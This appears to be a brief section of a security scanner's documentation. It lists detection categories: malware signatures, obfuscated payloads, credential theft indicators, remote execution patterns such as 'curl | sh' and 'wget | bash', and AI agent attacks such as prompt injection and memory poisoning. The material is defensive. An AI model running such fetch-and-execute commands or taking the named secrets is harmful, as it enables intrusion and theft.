# 7. Detection Methodology

### Malware & campaign patterns

Known malware families and exploit signatures.

### Obfuscation detection

Base64 payloads, eval construction, encoded strings.

### Credential theft indicators

Cloud keys, exchange APIs, wallets, CI/CD secrets.

### Remote execution indicators

`curl | sh`, `wget | bash`, PowerShell loaders.

### Agent exploitation patterns

Prompt injection, memory poisoning, confused deputy.

### Threat intelligence

Known malicious publishers, wallets, IPs, domains.